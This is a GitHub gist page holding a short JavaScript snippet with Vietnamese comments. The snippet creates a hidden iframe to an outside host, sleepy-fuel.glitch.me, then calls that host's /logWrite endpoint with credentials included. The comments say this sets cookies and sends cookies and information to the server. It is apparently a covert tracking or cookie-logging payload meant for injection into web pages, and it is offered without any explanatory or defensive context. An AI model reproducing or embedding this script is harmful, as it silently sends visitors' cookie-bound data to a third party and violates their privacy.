Skip to content

Instantly share code, notes, and snippets.

@conanak99
Last active August 20, 2017 15:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save conanak99/ed5cde5af5a7cbe74e26047d8c76f45d to your computer and use it in GitHub Desktop.
Save conanak99/ed5cde5af5a7cbe74e26047d8c76f45d to your computer and use it in GitHub Desktop.
// Tạo iframe ẩn để set cookies
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "https://sleepy-fuel.glitch.me";
document.body.appendChild(iframe);
// Gửi cookies và thông tin lên server
setTimeout(() => {
fetch('https://sleepy-fuel.glitch.me/logWrite', {
method: 'GET',
credentials: 'include'
});
}, 2000);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment